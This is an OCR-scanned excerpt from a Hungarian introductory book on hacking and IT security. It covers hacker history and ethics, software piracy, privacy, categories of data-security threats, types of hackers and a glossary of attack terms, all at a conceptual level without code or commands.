A hacker jelenséget egy igény és lehetőség szülte. A rendsze­ rek minden részletre történő használatának igénye és a szoftve­ rek sebezhetőségének a lehetősége. A szakmai ismeretek meg­ szerzése, kipróbálása azonban károkozás és bűncselekmények elkövetése nélkül is lehetséges. A határ a legális és illegális tevékenységek között sokszor nem egyértelmű és az új dolgok kipróbálásának vágya, a hírnév utáni epekedés, vagy beteges vandál hajlamok gyakran ledönt­ hetik a morális gátakat. Problémák valójában ebből keletkez­ hetnek és sokszor felelőtlen fiatalok csínytevéseiről van csupán szó. De nem minden esetben... Elfogadható-e például, ha valaki betör egy egészségügyi rendszerbe, pusztán azért, hogy megbizonyosodjon afelől, hogy ez lehetséges? A kérdés még érdekesebb akkor, ha a betörés visszakövethető nyomok és károkozás nélkül elvégezhető. Egy megközelítés szerint ezzel nincsen semmi probléma, ezen vélemények osztói a „szürke-, vagy árnyékzónába" tar­ toznak. Egy másik megközelítés szerint az engedély nélkül végzett tevékenységek nem egyszerűen illegálisak, hanem veszélyesek is, mert potenciálisan kárt, zavart okozhatnak, illetve olyan módon is lehet adatokhoz hozzáférést szerezni, melyet az ada­ tok tulajdonosai nem engedélyeztek. Könyvünkben mi ez utób­ bi álláspontot és szemléletet képviseljük. Az egyetlen elfogadható kivétel az engedély birtokában vég­ zett, megelőző jellegű hacker tevékenység, ami az etikus hacke­ rek világa.

18

1-3.

Kezdő hackerek kézikönyve

Miért lehet hackelni?

Jogos kérdés, hogy egyáltalán miért játszhatóak ki az infor­ matikai rendszerek? Az ok a bonyolultság és a fejlesztések egyre őrültebb tempó­ ja, sokszor a profithajhászás jegyében. Egy modern operációs rendszer forráskódja sok millió kód­ sort számlál. Ilyen szintű bonyolultság esetén olyan kölcsönha­ tások érvényesülnek a szoftverek és komponenseik között, hogy a hibák és így 3 biztonsági kockázatok előfordulása mármár törvényszerű. Másrészt a programozókat túl gyors munkára kényszerítik, ami sokszor a minőség rovására megy. Persze a szakmai hozzánemértés és hanyagság is szerepel az okok listáján.

1.4.

A hackerek titkai?

Vajon miért övezi titokzatosság a hackerek tudását? Ennek oka régebben feltehetően az volt, hogy viszonylag kevesen használtak számítógépeket. Ezért a komolyabb hacker tudás érthetetlennek tűnhetett a legtöbb laikusnak. Napjainkban már szinte mindenki használ számítógépet, de ennél is sokkal fontosabb, hogy mindenki hozzáférhet az inter­ nethez és egy olyan tudásbázishoz, melyről korábban álmodni sem lehetett. Az interneten rengeteg fórum, weblap foglalkozik különféle feltörési technikák bemutatásával. Ezért elmondhat­ juk, hogy a használható „hackertudás" titkossága ma már in­ kább mítosz, mint valóság. Ha valakit érdekel a téma és meg­ van benne a motiváltság mellett a technika iránti érdeklődés is, igen hamar használható „tudásra" és „gyakorlatra" tehet szert. Ami miatt még manapság is léteznek elit hackerek és hackercsoportok, az az, hogy ezek az emberek kivétel nélkül komoly szakmai képzettséggel rendelkeznek, ami jóval túlmutat né­ hány internetes leírás áttanulmányozásán. Erre a szintre sok tanulással és munkával, évek alatt lehet csak eljutni.

Hacker történelem

19

°°o A köztudatban a kiberbűnözők által használt hardver- és szoftvereszközök egyedileg megírt programokként, vagy szkriptekként jelennek meg. A valóság az, hogy ezek legtöbbje ingyenesen elérhető, sőt sok esetben nyílt forráskódú alkalma­ zás. Figyelemre méltó, hogy egyes cégek kereskedelmi szoftvere­ ket és/vagy hardvereket is árusítanak, melyekkel szintén pro­ fesszionális módon lehet akár támadásokat, feltöréseket, „jelszóvisszaállításokat,/kivitelezni. Az egyik ilyen cég az Elcomsoft: https://www.elcomsoft.com/

1.5.

A szoftverkalózkodásról

A szoftverkalózok programokat módosítanak a program ké­ szítőinek engedélye nélkül és ezeket a módosított változatokat legtöbbször meg is osztják másokkal. A módosítások általában biztonsági mechanizmusok kiiktatását tartalmazzák, hogy pél­ dául érvényes liszensz nélkül is használni lehessen egy adott kereskedelmi forgalomban kapható szoftvert. A szoftverkalózkodás nagyon régi jelenség, már a mikro­ számítógépek (Commodore 64 és társai) fénykorában is virág­ zott. A kalózok tevékenységüket előszeretettel indokolják azzal, hogy a szoftverek gyártói olyan dologért kérnek el sok pénzt, aminek valójában ingyenesnek kellene lennie. A feltört (módo­ sított) programok terjesztése szerintük lovagias tett, egyfajta Robin Hood történetét idéző cselekedet.

20

Kezdő hackerek kézikönyve

A valóság ezzel szemben az, hogy a feltört szoftverek a mó­ dosítások miatt bizonyos fokú sérülést szenvedhetnek, amiből kifolyólag gyakorta lefagynak, nem megfelelően működnek stb. Ráadásul a feltört szoftverek letöltését sokszor valamilyen fize­ tős szolgáltatással kötik egybe. így ezek a Robin Hood-ok saját maguk válnak olyanná, akik ellen állításuk szerint fellépnek. Ennél is nagyobb baj azonban maga a tény, hogy a szoftverka­ lózkodás mások verejtékes munkáját veszi semmibe, ami er­ kölcstelen. Sok feltört szoftver „bonuszként" ráadásul kártékony kódot is tartalmaz, melyet előszeretettel használnak kémkedésre, adatlopásra. A kalózkodás ezen a ponton kapcsolódik könyvünk témájá­ hoz, de nem központi témája könyvünknek.

1.6.

A „tuti" hacker módszerekről

Bizonyára elgondolkodtunk már azon, hogy hogyan lehet feltörni jelszavakat, weblapokat, egyáltalán: hogyan zajlik mindez. Mint könyvünk későbbi fejezeteiben is látni fogjuk, számtalan módszer létezik, melyek alkalmazása azonban hard­ veres és szoftveres feltételek függvénye. Éppen ezért komolytalan lenne azt mondani, hogy bemutat­ ható lenne a nagy betűs módszer, amivel minden jelszó feltör­ hető és minden biztonsági rendszer kijátszható. Ez egyszerűen butaság. A valódi behatolások sikere éppen abban rejlik, hogy a tá­ madásokat egy adott rendszerre, gépre szabják, tervezik. Ez még annak ellenére is igaz, hogy manapság már igen kényel­ mes szoftveres eszközök állnak a támadók rendelkezésére. A felkészülést, tanulást nem lehet megspórolni. Viszont mi­ nél többet foglalkozik az ember vele, annál magasabb szintre lehet eljutni.

1.7.

A hackercsoportok jövője

A hackercsoportok korábban erősen rendszerkritikus hozzá­ állást tanúsítottak és tevékenységeiket is ehhez igazították.

21

Hacker történelem

Ez a trend valószínűleg mindig is kimutatható lesz, ám a profi hackercsoportok aktivitásában megfigyelhető egyfajta kanalizálódás, illetve fókuszálódás. Ez kisebb részt üzleti okokra vezethető vissza. Számos nagyvállalat alkalmaz etikus (és kevésbé etikus) hackereket saját rendszereik védelmének erősítésére, illetve a konkurencia fi­ gyelésére. Az információszerzési tevékenységek jelentős részben kez­ denek áttevődni a virtuális térbe, így érthető az egyes országok kormányainak érdeklődése is a nemzetbiztonsági érdekű adat­ szerzési és kibervédelmi tevékenységek iránt. Ez hírszerzési és újabban kifejezetten katonai jelleget kezd felvenni, hiszen egy fejlett ország infrastruktúrája, közműrendszere, kommunikáci­ ós csatornái messzemenően támadhatóak informatikai eszkö­ zökkel. Ennek pedig konkrét gazdasági, ill. geopolitikai követ­ kezményei lehetnek.

1.8.

Elit hackercsoportok és a politika

Számos hacker csoport létezik, melyek kifejezetten politikai berendezkedésekkel szemben, vagy azok mellett foglalnak ál­ lást és akcióikat is ennek szellemében hajtják végre. (Az, hogy az egyes kormányok milyen szinten támogatnak egyes csopor­ tokat, könyvünk szempontjából nem fontos.) Ezek a csoportok igen magas szinten végzik tevékenységei­ ket. A német Chaos Computer Club például egy klasszikusnak nevezhető hackercsoport, mely néhány évvel ezelőtt egy akció­ jában Wolgang Scháuble miniszter ujjlenyoma­ tát szerezte meg. Az alábbiakban né­ hány további hackercsoportot nevezünk meg. Ezek mind létező, valódi csoportok. Anonymous nemzetközi hackercsoport

22

Kezdő hackerek kézikönyve

CyberBerkut oroszbarát ukrán hackercsoport

Szíriái Elektronikus Hadsereg (SEA) szír, kormánybarát csoport

RedHack csoport

Informatikai támadások madártávlatból

23

2. Informatikai TÁMADÁSOK MADÁRTÁVLATBÓL 2.1.

Gondolatok az adatvédelemről

Mielőtt fejest ugranánk az informatikai biztonság bugyraiba, közelítsük meg a témakört még általánosabban, lefektetve an­ nak a tudatosságnak az alapjait, mely oly gyakran hiányzik napjainkban társadalmi szinten is. Személyes adataink fontosak számunkra. Nevünk, címünk, bankszámlaszámunk, telefonos előfizetésünk mind-mind olyan adatok, melyek minket, tevékenységeinket írnak le. Ezek ké­ nyes adatok, mert visszaélésekre adhatnak lehetőséget, más­ részt pedig nem tartozik senki másra. Lehetséges-e személyes adatainkat képletesen lelakatolni? Ha teljesen őszinték akarunk lenni: a 21. században ez már aligha lehetséges. Mindennapi tevékenységeinkkel szinte nagy­ üzemben gyártjuk magunkról az adatokat. Ha reggel elindu­ lunk gépjárművünkkel, mobiletelefonunkon keresztül rögzíthe­ tik az általunk megtett útvonalat. Ha bankkártyánkkal vásáro­ lunk, eltárolódik, hogy hol, mit vettünk, mennyit költöttünk. Még hosszasan sorolhatnánk. Ezek az adatok azért is kényesek, mert időrendben elraktá­ rozva, közöttük olyan összefüggéseket lehet megállapítani, me­ lyek nyitott könyvvé tehetik életünket. Nem azért nem szeret­ jük ezt, mert rejtegetni valónk lenne, hanem azért, mert a ma­ gánélethez mindenkinek joga van. Ez sajnos még sincsen így, a következőkben erre mutatunk be pár példát.

24

Kezdő hackerek kézikönyve

Az USA talán az állatorvosi ló is lehet ebből a szempontból. A „szabadság hazájában" ugyanis nagyüzemben élnek vissza cégek és állami szervezetek is a személyes adatokkal. Újra és újra hallani adatkezelési botrányokról, de biztosak lehetünk benne, hogy ez csak a jéghegy csúcsa. A szeptember 11-i terrortámadásokat megelőzően sem volt ez másként, azóta viszont méginkább előtérbe kerültek a törvénytelen adatgyűjtések ügyei. Az alapvető kérdés mindig ugyanaz: a magánéletünkből mennyit vagyunk hajlandóak feláldozni a biztonságunk érde­ kében? A valóságban az elért biztonság elenyésző szintű, az adatgyűjtések viszont szó szerint ipari méreteket öltenek. Elolvastuk-e valaha is az általunk használt közösségi oldalak felhasználási feltételeit? Lehet, hogy meglepődnénk... Bevett gyakorlat ugyanis, hogy az ilyen oldalak felhasználási feltétel­ ként szabják, hogy az oldalon közzétett minden tartalom az ol­ dal tulajdonát fogja képezni. Az adatok így kiértékelhetőek, statisztikák készíthetőek belőle, eladhatók, stb. Az e-mail, vagy chat szolgáltatók is szinte minden informá­ ciót rögzítenek és meg is tartanak. Hamis illúzió volna azt hin­ ni, hogy leveleink kitörlésével azok valóban meg is semmisül­ nek. Könnyen lehet, hogy nem. A levelek egy esetleges hivata­ los felkérés esetén ugyanúgy visszakereshetőek még évek után is a szolgáltatónál. A baj nem ez, hanem az, hogy a legtöbb em­ ber ezt nem tudja, és ha tudná, nem értene egyet vele. Márpedig így van. Szintén az USA-hoz köthető tény a külföldi vonatkozású te­ lefonhívások rögzítése, gépi és manuális kielemzése. Ráadásul telefonálni manapság az interneten is lehet, többféle technológia teszi lehetővé az internetes hangtovábbítást, melynek gyakorla­ ti megvalósulásai az ún. IP telefonrendszerek is. A beszélgeté­ sek digitális rögzítése lehetséges és meg is teszik. Mihez kezdenek ezzel a hatalmas adatmennyiséggel? Rögzí­ tik és elemzik őket. Egyfelől biztonsági megfontolásból (bűnö­ zés elleni harc), másfelől kereskedelmi céllal. A terrorizmus el­ leni harc például kiváló ürügy szokott lenni az állami szintű lehallgatások kapcsán, a gond csak az, hogy ezek az elemző­ rendszerek nem mindig képesek érdemben működni és renge­

Informatikai támadások madártávlatból

25

teg téves következtetést mutatnak fel. A kereskedelmi célú felhasználás ellenben kifejezetten jövedelmező. Ezzel viszont az a baj, hogy személyünkhöz fűződő adatainkat akár el is adhatják olyan cégeknek, melyek ezzel kereskednek. Nem tudtuk, hogy van ilyen? Pedig van. így olyan kezekbe is kerülhetnek adata­ ink, információk szokásainkról, ahol már nem biztos, hogy szí­ vesen látnánk őket. Továbbá, ha adatainkat az első adatkezelő még úgy ahogy elfogadhatóan kezelné is (biztosan nincs így), mire az X+l. adatkezelőhöz kerülnek adataink, ott már lehet, hogy nem is annyira szigorúan kezelik az egészet. Tulajdon­ képpen hátborzongató az egész. Mégis mi lehet a megoldás? Hagyjunk hátra mindent és köl­ tözzünk ki egy erdő közepére, vagy egy barlangba? Semmikép­ pen sem! Életünket viszont alakíthatjuk úgy, hogy odafigyelünk arra, kinek adjuk ki adatainkat. Ez az információtudatosság alapelve.

2.2.

A biztonság mítosza

Rögtön az elején tisztázzuk: száz százalékos biztonság nem létezik! Ilyen nincs! Mégegyszer leírjuk: nem létezik száz szá­ zalékos biztonság. A számítástechnika, mint technológia, felépítéséből adódóan eredendően sérülékeny. Tetszik, vagy nem: ez van. Ráadásul az információk megszerzésének végső formája fizikai hozzáférés is lehet, ami ellen semmit sem ér a szoftveres védelem. Még ha a legbiztonságosabbnak vélt hardverrel és szoftverrel is van fel­ szerelve egy számítógép, mit sem ér, ha valaki egyszerűen csak odasétálhat hozzá és ellophatja...

o o ,

Az információs biztonsági tudatosság legfontosabb meg­ állapítása, hogy nem létezik száz százalékos biztonság. Punktum!

Kezdő hackerek kézikönyve

26

Amit tenni lehet, az az, hogy az ember igyekszik csökkenteni a kockázatokat és ésszerű ellenlépéseket tesz. Nagy cégek, vagy állami szintű intézmények számára ez így is folyamatos harcot jelent a biztonságért. Magánemberek szá­ mára jó hír azonban, hogy egy bizonyos biztonsági szint elérése után egy bűnöző számára egyszerűen nem éri meg erőltetni a dolgot és inkább a kisebb ellenállás felé mozdul: kevésbé tuda­ tos felhasználók rendszerei felé. A magánszemélyek minimális célja tehát alapvetően ennek a szintnek az elérése kell, hogy legyen. Ez már sokkal könnyebben megvalósítható, mint demilitarizált övezetté változtatni otthonunkat. A lehetséges védekezési stratégiák megismerése és alkalma­ zása tehát nem értelmetlen dolog.

2.3.

Visszaélések típusai

Alapvetően a következő típusú kártékony tevékenységeket lehet megkülönböztetni, melyek célja információszerzés lehet: í. Emberek manipulációja (angolul: "social engineering"): ezek a támadások az emberek ösztönös bizalmával élnek vissza, Ül. alapvető emberi viselkedési mintákat használ­ nak ki. 2. Fizikai támadás: adott esetben könnyebb lehet egyszerűen betörni egy épületbe, vagy a célpont szemetes zacskói kö­ zött keresgélni értékes információk után, mint számítástechnikai módszerekkel bajlódni. 3. Hardveres támadás: a támadások végrehajtásához, vagy előkészítéséhez valamilyen speciális hardvereszköz hasz­ nálata, pl. hardveres billentyűnaplózóé. 4. Szoftveres támadás: számítógépes programok, vagy pa­ rancsok végrehajtásával kivitelezhető támadások. A köz­ tudatban leginkább ennek a képe sejlik fel, amikor hackerekről esik szó. A gyakorlatban persze sokszor ezek kombinációja lehet a legveszélyesebb. A következőkben ezen támadási típusok fajtáit tekintjük át, majd néhányat kiválasztunk és részletesebben is tárgyalni fogunk.

Informatikai támadások madártávlatból

2.4.

27

Adatbiztonság és adatvédelem*

A számítógépen tárolt adatok - akár eszmei, akár anyagi ér­ tékben - sokszor jóval többet érnek, mint maga a hardver. Igen fontos tehát, hogy tudjuk, milyen veszélyek leselkednek adata­ inkra, és mit tehetünk azok megóvása érdekében (vagy ha ez nem sikerült, úgy mit tehetünk, hogy minimalizáljuk vesztesé­ geinket). Természetesen mint korábban írtuk, tökéletes bizton­ ság nem létezik, de erre való szándék igen. Az adatbiztonság az adatok jogosulatlan megszerzése, mó­ dosítása és tönkretétele ellen tett olyan eljárások, szabályok, műszaki és szervezési intézkedések együttes rendszere, mely­ nek célja az informatikai rendszerek, és rendszerelemek műkö­ désének biztosításán keresztül, az ezekben tárolt adatok bizton­ ságának megteremtése. Informatikai biztonság alatt valamely informatikai rendszer azon állapota értendő, amelyben a kockázatokat, amelyek ezen informatikai rendszer bevezetésekor a fenyegető tényezők alap­ ján adottak, elfogadható intézkedésekkel elviselhető mértékűre csökkentettük. Az adatvédelem az adatok kezelésével kapcsolatos törvényi szintű jogi szabályozás formája, amely az adatok valamilyen szintű, előre meghatározott csoportjára vonatkozó adatkezelés során érintett személyek jogi védelmére és a kezelés során fel­ merülő eljárások jogszerűségeire vonatkozik. 2.4.1.

Adatbiztonsági fenyegetettségek

A számítógépes rendszert, illetve az azokon tárolt adatokat igen sok veszély fenyegeti. (Meghibásodások, sérülések, áram­ szünet, túlfeszültség, illetéktelen hozzáférés, vírusok, stb.) Eze­ ket négy fő csoportba sorolhatjuk. Rendelkezésre állás ellen irányuló fenyegetettség

Ide soroljuk azokat a veszélyeket, amelyek a számítógépes rendszer folyamatos és biztonságos működését fenyegetik. Egyes helyeken igen nagy problémákat okozhat, ha a rendszer működése folyamatosan nem biztosítható, vagy ha a rendszer A'szerző engedélyével, Bártai Barnabás: Számítógéphasználat mindenkinek c. könyve alapján

28

Kezdő hackerek kézikönyve

leáll. Gondoljunk csak egy bankra, ahol a teljes ügyfélforgalmat béníthatja meg a rendszer leállása, hiszen ha egy használt szá­ mítógépes rendszer a kellő időpontban nem áll rendelkezésre, megakadályozhatja, vagy jobb esetben jelentősen lelassíthatja a munkát. A rendszer rendelkezésre állása akkor nem kielégítő, ha funkcióihoz, adataihoz a felhasználó nem, vagy nem megfe­ lelő módon (pl: sokat kell várni, nem jön létre a kapcsolat) fér hoz­ zá. A folyamatos rendelkezésre állás biztosítása érdekében leg­ fontosabb, hogy a szükséges berendezések folyamatos tápfe­ szültség ellátását biztosítani tudjuk. Ehhez a megfelelő eszkö­ zöket szünetmentes tápegységgel (UPS) lássuk el, hogy áramkimaradás esetén is biztosíthassuk a működését, vagy kellő idő álljon rendelkezésre a rendszer adatvesztés nélküli, szabályos leállítására. Természetesen e mellett fontos, hogy az eszközök hálózati kapcsolója megfelelően biztosítva legyen a véletlen lekapcsolástól, illetve az illetéktelen személyek általi hozzáféré­ sétől. Ugyanígy fontos, hogy a rendszerbe szoftveres úton ille­ téktelen személy ne kapcsolódhasson be, s így a rendszer mű­ ködését ne béníthassa meg. További fontos intézkedés a rend­ szert potenciálisan használni tudó személyek figyelmének meg­ felelő felhívása a rendszer használatának szabályairól, annak leállításának, működése szüneteltetésének feltételeiről és pontos módjáról. Sértetlenség ellen irányuló fenyegetettség

Mivel a számítógépes rendszereken tárolt adatokat teljes biz­ tonságban szeretnénk tudni, mindent el kell követni annak ér­ dekében, hogy azok sérthetetlensége a maximális legyen. Töké­ letességre kell törekednünk annak ellenére, hogy tudjuk, ezt megvalósítani nem lehet. Természetesen meghibásodások elő­ fordulhatnak, de ma már léteznek olyan technológiák, amelyek alkalmazásával adatainkat nem veszítjük el egy esetleges hard­ verhiba esetén sem (pl. raid). A rendszer sértetlensége akkor nem megfelelő, ha a szolgál­ tatott adatok rendszerhiba, vagy szándékos rongálás miatt a valóságostól eltérőek lehetnek. A számítógépeken tárolt adato­ kat fenyegető veszélyek közt jelenleg az egyik legnagyobb

Informatikai támadások madártávlatból

29

problémát a számítógépes vírusok okozzák, melyek nagy része az adatokat megsemmisíti, vagy használhatatlanná teszi. Mindemellett igen fontos, hogy a rendszer felépítése (főként a szoftveré) olyan legyen, hogy az abban tárolt adatok haszná­ lati joga legyen jól elhatárolt, és ezt a rendszer szigorúan köve­ telje is meg. Az adatok önkényes javítására ne legyen lehetőség, illetve a legális beavatkozások jellemzőit (név, időpont, stb.) a rendszer regisztrálja. További igen fontos követelmény, hogy a rendszerbe illetéktelen személy ne kapcsolódhasson be, s így a rendszerben tárolt adatokat ne semmisíthesse meg. Természete­ sen egy kikapcsolt, vagy zárt helyiségben lévő önálló számító­ gépre távolról rákapcsolódni nem lehet. Annál kockázatosabb viszont a hálózatba kötött számítógépeken való adattárolás, hiszen kellő szakértelemmel a hálózaton (pl. internet) keresztül elérhetőek lehetnek adataink. (Persze az elsődleges célpont nem az otthoni gépen tárolt, más számára semmitmondó adatok.) A számítógépes „betörések" nagy része azonban visszavezethető egy nem kellő titkossággal kezelt magasabb jogosultságokat biztosító jelszó illetéktelen kézbe kerülésére. (A helyzet azért nem annyira vészes, mint amennyire az némely mai, a valóság­ tól elrugaszkodó, ostobaságoktól hemzsegő filmben látható.) Hitelesség ellen irányuló fenyegetettség

Egy számítógépes rendszer által szolgáltatott adattól elvár­ juk, hogy az emberi szubjektumtól mentes, valós alapokra épü­ lő legyen. Pontosan e miatt követelmény, hogy a számítógépes rendszerben tárolt adatokról teljes biztonsággal állíthassuk azt, hogy azok hitelesek. Hiteles adatot csak akkor tudunk szolgál­ tatni, ha az előállított adatot, illetve az adatok előállításának forrásaként szolgáló egyéb adatokat teljes biztonsággal tároljuk, dolgozzuk fel, és szolgáltatjuk ki. Ennek megfelelően egy szol­ gáltatott adat csak akkor lesz hiteles, ha azt hiteles forrásból állítjuk elő, tehát a rendszerben tárolt adatok illetéktelen sze­ mély által garantáltan nem befolyásolhatók. A hitelesség igazolásának egyéb külső megnyilvánulásai is lehetnek, melyek az adott adat, vagy irat típusától függően vál­ toznak. (pl. a számla hitelességéhez bélyegzőlenyomat és alá­ írás is kell.) A számítógépes információtovábbításban a hiteles­

Kezdő hackerek kézikönyve

30

ség igazolására különböző titkosított mechanizmusokat dolgoz­ tak ki. Ilyen lehet az elektronikus aláírás, vagy a kulcs. A jelen­ leg alkalmazott kétkulcsos technikák lényege az, hogy a címzett és feladó által is speciálisan hozzáférhető adatbázis segítségével a levelezésben résztvevők kódokkal rendelkeznek. Az üzenet kódolása a feladó saját titkos és a címzett publikus kódjával tör­ ténik. Az üzenet kódolva kerül továbbításra, így azt a hosszú kódkulcs miatt más megfejteni nem tudja. A dekódolás pedig a címzett titkos és a feladó publikus kódja alkalmazásával valósít­ ja meg a szoftver. Bizalmasság ellen irányuló fenyegetettség

A bizalmasság elvesztéséről akkor beszélünk, ha a rendszer határait olyan adatok hagyják el, amelyeknek nem lenne sza­ bad. A számítógépes adatbázisok adatainak jelentős részét képe­ zik olyan adatok, melyek nem nyilvánosak, bárki számára nem megismerhetők. Az ilyen adatok tárolásának és lekérdezésének lehetőségét szigorúan kell szabályozni, s az illetéktelen szemé­ lyek által való hozzáférését megakadályozni. Azt, hogy mely adat bizalmas és mely nem, a számítógép eldönteni nem tudja. Ez emberi döntéseken alapul, de a számítógépes rendszer fel­ építésének és használatának alkalmazkodnia kell, mivel a bi­ zalmasan kezelendő adatok kitudódása az adat tulajdonosát valamilyen hátrányba hozhatja.

2.5.

Hackerek típusai

A szakma és a szakirodalom különféle típusú hackereket kü­ lönböztet meg, tevékenységeik és céljaik függvényében. Teljes körű bemutatásra itt nem vállalkozunk, viszont érdemes tisztá­ ban lenni legalább a legfontosabb fogalmakkal. Fehér kalapos hacker („white hat hacker")

Ezek a szakemberek nem károkozási céllal, éppen ellenkező­ leg: saját, vagy megbízójuk rendszerének tesztelése céljából haj­ tanak végre betöréseket, legális úton, engedéllyel. Ezeket a hac­ kereket etikus hackereknek is nevezik.

Informatikai támadások madártávlatból

31

Fekete kalapos hacker („black hat hacker")

Ezek a szakemberek a törvényesség kereteit átlépve, saját ér­ dekükben, vagy illegális megbízások érdekében tevékenyked­ nek. A „hacker" kifejezés széleskörűen elterjedt pejoratív jelentéséért el­ sősorban ezeknek az embereknek a tevékenysége tehető felelőssé. Őket nevezhetjük cracker-eknek is. Szürke kalapos hacker („grey hat hacker")

Ezek a szakemberek folyamatosan biztonsági hiányosságok után kutatnak és ezt a tudásukat igyekeznek pénzzé is tenni. Biztonsági hibákról szóló információkat gyakran nyilvánosság­ ra hoznak. A szürke kalapos hackerek a legalitás határmezsgyéjén mo­ zognak, ami gyakran etikátlannak tekinthető lépésekben nyil­ vánul meg. Elit hacker („elite hacker")

A legmagasabb szintű tudással és elismertséggel rendelkező szakemberek, akik minden tekintetben az élen járnak. Vannak, akik a jó oldalon állnak, míg mások nem. Szkriptkölyök („script kiddies")

Olyan tapasztalatlan (többnyire) fiatal felhasználók, akik többnyire más hackerek által írt szkripteket, alkalmazásokat használnak tevékenységeikhez. Felületes és hiányos technikai ismeretekkel rendelkeznek, de így is nagy károkat tudnak okozni. Hacktivista („hacktivist")

Olyan hacker, aki a tevékenységével társadalmi, politikai stb. üzenetet közvetít, ill. igyekszik terjeszteni. Telefon hacker („phreaker")

Ez ma már ritkább kategória, de a hőskorban rengeteg hac­ ker kezdte pályafutását telefonrendszerek feltörésével, manipu­ lálásával.

Kezdő hackerek kézikönyve

32

2.6.

Támadások, támadóeszközök, szakkifejezések

Az alábbiakban rövid magyarázat kíséretében felsoroljuk a leggyakrabban használt szakkifejezéseket. Megjegyezzük, hogy a gyakorlatban ezeket nem elkülönülve, hanem gyakran kom­ binálva is használhatják. A felsorolt módszerek közül a későbbi fejezetekben többet a gyakorlatban is be fogunk mutatni. Adathalászat („Spoofing attack, phishing")

Az adathalász támadás során a támadó hamis néven küld emaileket, vagy hamisított webhelyek segítségével jut személyes, bizalmas adatokhoz. Aranymosás

Forráskódok elemzése, átkutatása használható információk után. Befecskendezés ("injection")

Olyan módszer, melynek során feldolgozandó adatokba pa­ rancsokat, utasításokat rejtenek és a parancsot feldolgozó szoft­ vert ezek végrehajtására kényszerítik. A leggyakrabban az SQL befecskendezésről és a parancsbefecskendezésről lehet hallani. Behatolási tesztelés ("Penetration testing")

A szoftvertesztelés egy speciális típusa, mely kifejezetten a célrendszer sebezhetőségét vizsgálja és értékeli ki. Ez tipikusan az etikus hackerek területe. Betörő készlet („rootkit")

A rootkitek használóikat olyan szintű jogosultsághoz juttat­ ják, melyekhez egyébként nem lenne hozzáférésük. Billentyűnaplózás („keystroke logging, keylogging")

A billentyűnaplózás egy naplózóprogrammal, vagy speciális hardverrel végrehajtott támadás, melynek során a megtámadott számítógéphez kapcsolt billentyűzettel végzett gépelés kerül rögzítésre. A rögzítés során egy naplófájl keletkezik. A hardve-

Informatikai támadások madártávlatból

33

rés naplózó egy toldalék a billentyűzet és a számítógép között. Előnye, hogy szoftveresen nem észlelhető, hátránya viszont, hogy elhelyezése, valamint eltávolítása kockázatos és személyes jelenlétet igényel, ami nem minden esetben kivitelezhető. Csomagelemzés („packet analyzis")

A csomagelemző program olyan alkalmazás, ami adatcso­ magokat gyűjt és elemez, amiből például jelszavakat és egyéb információkat képes kinyerni. Emberek félrevezetése („social engineering")

Ezen támadásforma elsődleges célja információk, ill. fizikai hozzáférések megszerzése az emberi hiszékenységgel és általá­ nos viselkedésmintákkal történő visszaélésen keresztül. Etikus hackelés („ethical hacking")

Leglálisan végzett hackelési tevékenység, mely a biztonsági hiányosságok feltárását és dokumentáslást célozza, szigorúan károkozás nélkül. Minden esetben írásos engedéllyel végzik, erre felkészített szakemberek. Etikus hackereket egy cég saját maga is foglalkoztathat, vagy külsős céget bíznak meg ilyen feladattal. A cél megbízásonként változhat és nem mindig az informati­ kai rendszerekbe történő behatolásról szól, hanem például egy cég alkalmazottainak, a biztonsági előírások betartásának az ellenőrzéséről. Az etikus hackereket nagy becsben tartják, mert nagy tudást (és sok titkot) halmoznak fel pályafutásuk során. Feltörés („cracking")

Védelmi mechanizmusok kiiktatása, megkerülése szoftverek esetében. Ez jelentheti például jelszavak, kulcsok kitalálását, de szoftverek „fizikai" manipulálását is egy adott cél érdekében. Féreg („worm")

Általában az operációs rendszerek biztonsági réseit kihasz­ náló alkalmazások, melyek információkhoz juttatják készítőiket.

34

Kezdő hackerek kézikönyve

A férgek általában önállóan futó alkalmazások, futásukhoz nem szükséges más program. Hagyma útvonalválasztás („onion routing")

Olyan speciális hálózati adattovábbítás, mely több, köztes ál­ lomáson keresztül, titkosítást is alkalmazva képes adatot eljut­ tatni egyik helyről a másikra. Ezt használja a Tor hálózat is, amiről könyvünk a 3. fejezetEben részletesebben is szólunk. Harci kocsikázás („war driving")

A támadási forma során vezeték nélküli hálózatokat szoktak feltérképezni. Az így előállított „hálózati térkép" általában kü­ lönböző információkat tartalmaz a hálózati hozzáférési pontok­ ról. Az elnevezés onnan ered, hogy az adatgyűjtés során a célte­ rületen fizikailag jelen kell lenni és mozogni kell, miközben egy speciális alkalmazás az elérhető hálózatokat pásztázza és ada­ tokat gyűjt. Hash ütközés ("hash collosion")

Olyan sebezhetőség, melynek során két különböző adat ugyanazt a hash-t produkálja. Ez a hash generáló algoritmus hibája. Ilyen sebezhetősége van például az eredeti MD5 ujjle­ nyomat készítésnek is. Hátsó kapu („backdoor")

Olyan támadóeszköz, mely az operációs rendszer szintjén képes észrevétlenül hozzáférést biztosítani számítógépekhez. A hátsó kaput egy biztonsági hiányosság teszi lehetővé és vagy eleve jelen van a rendszerben, vagy némi szoftveres „rásegítés­ sel" lehet kihasználni. Hátsó kapunak tekinthetőek speciális hozzáférési, jogosultsági beállítások is. Jelszavak feltörése („password cracking")

A jelszavak feltörése történhet automatizált módon, segédprogramok használatával, manuálisan, azaz kézi begépeléssel, vagy a jelszavak titkosítatlan formában történő megszerzésével (adatbázisokban tárolva, vagy hálózati forgalomban elcsípve). A cél minden esetben egy másik személyhez köthető hozzáférés

Informatikai támadások madártávlatból

35

megszerzése és az ő nevében történő cselekvés, a támadó valós identitásának elrejtése érdekében. Kémprogramok ("spyware")

A kémprogramok kifejezetten bizonyos típusú tevékenysé­ gek figyelésére használhatóak. Elsődleges céljuk az adatrögzí­ tés, mely adatelemzéssel is kombinálható. A kémkedés célpont­ ja lehet egy személy, vagy egy számítógép, egy szoftver bizo­ nyos típusú tevékenysége. Kéretlen levelek („SPAM")

